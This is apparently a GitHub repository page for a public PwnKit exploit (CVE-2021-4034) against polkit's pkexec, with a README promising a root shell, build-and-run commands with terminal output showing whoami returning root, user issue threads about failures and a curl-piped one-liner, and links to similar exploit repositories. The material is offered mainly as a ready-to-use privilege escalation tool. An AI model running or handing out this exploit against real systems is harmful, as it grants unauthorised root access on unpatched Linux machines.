CVE-2021-4034 One day for the polkit privilege escalation exploit

Overview

CVE-2021-4034

One day for the polkit privilege escalation exploit

Just execute make, ./cve-2021-4034 and enjoy your root shell.

The original advisory by the real authors is here

PoC

If the exploit is working you'll get a root shell immediately:

gconv-modules mkdir -p GCONV_PATH=. cp /usr/bin/true GCONV_PATH=./pwnkit.so:. [email protected]:~/CVE-2021-4034$ ./cve-2021-4034 # whoami root # exit">
[email protected]:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
[email protected]:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

Updating polkit on most systems will patch the exploit, therefore you'll get the usage and the program will exit:

[email protected]:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.
[email protected]:~/CVE-2021-4034$
Comments
  • RFE: Testing instead of actual rooting

    RFE: Testing instead of actual rooting

    What I need is to deploy a safe C binary to detect this CVE . Return 1 code if not already patched without actually rooting the system, return 0 if the system is patched. Can this RFE be added ?

    opened by tjyang 8
  • The value for the SHELL variable was not found the /etc/shells file

    The value for the SHELL variable was not found the /etc/shells file

    GLib: Cannot convert message: Could not open converter from “UTF-8” to “PWNKIT” The value for the SHELL variable was not found the /etc/shells file

    This incident has been reported.

    opened by condesings 6
  • One-liner: Use `eval` for the commands

    One-liner: Use `eval` for the commands

    This will execute shell-scripts that are `curl`ed using current shell.
    
    Fixes the pipe (stdin) problems when executing the ELF, alternatively
    using `bash` or `zsh` you can use process substitution.
    
    opened by owl4ce 2
  • pwnkit: Adds full PATH support

    pwnkit: Adds full PATH support

    This will take full control of executables on certain Linux systems that
    don't use /usr merge as their filesystem layout, for example Gentoo.
    

    https://wiki.gentoo.org/wiki//usr_move#Current_filesystem_layout https://freedesktop.org/wiki/Software/systemd/TheCaseForTheUsrMerge

    opened by owl4ce 2
  • Not work

    Not work

    ` [email protected]:~/forks_projets/CVE-2021-4034$ ./cve-2021-4034 pkexec --version | --help | --disable-internal-agent | [--user username] PROGRAM [ARGUMENTS...]

    See the pkexec manual page for more details. [email protected]:~/forks_projets/CVE-2021-4034$ pkexec --version pkexec version 0.105 `

    Linux xxxxxx 5.10.0-11-amd64 #1 SMP Debian 5.10.92-1 (2022-01-18) x86_64 GNU/Linux policykit-1-doc/stable-security,stable-security 0.105-31+deb11u1 all policykit-1-gnome/stable,now 0.105-7 amd64 policykit-1-gnome/stable 0.105-7 i386 policykit-1/stable-security,now 0.105-31+deb11u1 amd64 policykit-1/stable-security 0.105-31+deb11u1 i386

    opened by ZanyXDev 2
  • Makefile: Force `cp` to overwrite the existing one

    Makefile: Force `cp` to overwrite the existing one

    This fixes when the permissions of `true` on some Linux systems doesn't
    have write privileges, while the permissions are fully preserved by cp.
    

    On my Gentoo system, coreutils uses multicall, where the content of /bin/true is just a shebang with arguments and no write permissions. This only applies if wants to make again without cleaning it first (one-liner).

    $ file /bin/true
    /bin/true: a /usr/bin/coreutils --coreutils-prog-shebang=true script, ASCII text executable
    $ getfacl /bin/true
    getfacl: Removing leading '/' from absolute path names
    # file: bin/true
    # owner: root
    # group: root
    user::r-x
    group::r-x
    other::r-x
    
    opened by owl4ce 1
  • Doesn't do anything

    Doesn't do anything

    ~/CVE-2021-4034 $ ./cve-2021-4034
    ~/CVE-2021-4034 $ echo $?
    127
    ~/CVE-2021-4034 $ echo $UID
    1000
    

    It neither escalates privileges nor it prints pkexec usage. It just exits with 127 exit code.

    opened by eternal-sorrow 0
  • doesn't do anything

    doesn't do anything

    ~/CVE-2021-4034 $ ./cve-2021-4034
    ~/CVE-2021-4034 $ echo $?
    127
    

    I think it's an error related to environmental variables, how can I solve it? If it is not an environmental variable problem, I would appreciate it if you could tell me the cause and solution.

    opened by rioju412 0
Owner
Davide Berardi
Davide Berardi
PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)

CVE-2021-4034 PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034) https://seclists.org/oss-sec/2022/q1/80 http

Andris Raugulis 906 Sep 18, 2022
CVE-2021-4034: Local Privilege Escalation in polkit's pkexec proof of concept

CVE-2021-4034 Proof of Concept Qualys researches found a pretty cool local privilege escalation vulnerability in Polkit's pkexec: writeup, tweet. This

Marco Bonelli 20 Jun 22, 2022
Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

PwnKit Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation Usage Should work out of the box on Linux distributions based on U

Oliver Lyak 626 Sep 23, 2022
This repository contains an exploit of CVE-2021-4034, a local privilege escalation in pkexec

pwnkit (CVE-2021-4034) Privilege Escalation exploit sample This repository contains an exploit of CVE-2021-4034, a local privilege escalation in pkexe

Peter Gottesman 25 Aug 15, 2022
CVE-2021-24084 Windows Local Privilege Escalation Left officially unpatched since 2020. Hence, its still a zero day

WindowsMDM-LPE-0Day Works best on Windows 11 CVE-2021-24084 Windows Local Privilege Escalation Left officially unpatched since 2020. Hence, its still

Exploit Blizzard 36 Aug 31, 2022
CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation

CVE-2021-4034 CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation 根据CVE-2021-4034进行了加强,执行Exploit将会默认添加用户名rooter,密码[email protected],并且rooter用户将具

倾旋 84 Sep 23, 2022
Local Privilege Escalation Edition for CVE-2021-1675

Local Privilege Escalation Edition of CVE-2021-1675/CVE-2021-34527 Local Privilege Escalation implementation of the CVE-2021-1675/CVE-2021-34527 (a.k.

Halil Dalabasmaz 330 Sep 9, 2022
Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)

CallbackHell Exploit for CVE-2021-40449 (Win32k - LPE) CallbackHell Description Technical Writeup PoC References Description CVE-2021-40449 is a use-a

Oliver Lyak 417 Sep 18, 2022
A 3-D Printed Bot which can talk, cheer, dance and manage your day-to-day schedule.

cheerup A 3-D Printed Bot which can talk, cheer, dance and manage your day-to-day schedule. In childhood many of us have watched this show "SpongeBob

Aniket Dhole 4 Sep 5, 2021
Plex media server local privilige escalation poc - CVE-2021-42835

Local Privilege PlEXcalasion - CVE-2021-42835 Plex Media Server for Windows prior to version 1.25.0.5282, vulnerable to Time Of Check Time Of Use (TOC

null 6 May 24, 2022
PoC (DoS) for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)

CallbackHell DoS PoC for CVE-2021-40449 (Win32k - LPE) CallbackHell Description Technical Writeup PoC References Description CVE-2021-40449 is a use-a

Oliver Lyak 417 Sep 18, 2022
CVE-2021-4034 POC and Docker and Analysis write up

CVE-2021-4034 POC and Docker and Analysis write up

breeze 10 Jul 28, 2022
Proof of Concept (PoC) CVE-2021-4034

PwnKit-Exploit CVE-2021-4034 @c0br40x help to make this section in README!! Proof of Concept [email protected]:~/PwnKit-Exploit$ make cc -Wall exploit.

Luis Javier 56 Sep 14, 2022
PoC for cve-2021-4034

cve-2021-4034 PoC for cve-2021-4034 Based on the PoC by https://haxx.in: https://haxx.in/files/blasty-vs-pkexec.c. Probably he's https://github.com/bl

Michael Schmid 3 Jun 19, 2022
Pre-compiled builds for CVE-2021-4034

CVE-2021-4034 Precompiled builds for CVE-2021-4034. Of course you shouldn't trust precompiled builds :) This release works slightly different: first a

null 11 Jun 13, 2022
Bring your own print driver privilege escalation tool

Concealed Position Concealed Position is a local privilege escalation attack against Windows using the concept of "Bring Your Own Vulnerability". Spec

Jacob Baines 210 Sep 22, 2022
SystemGap - Maintenance Tools after privilege escalation

SystemGap 适用于解决不稳定Windows漏洞提权成功后进行权限驻守的办法 SystemGap - 监听者 SystemGap 负责监听一个任意用户可读写的匿名管道,从管道中读取命令进行执行 SystemGapClient - 发送者 SystemGapClient 负责向匿名管道中传入指令

倾旋 38 Aug 31, 2022
Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin.

RemotePotato0 Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin. RemotePotato0 is an exploit that allows you to escalate

null 1.1k Sep 20, 2022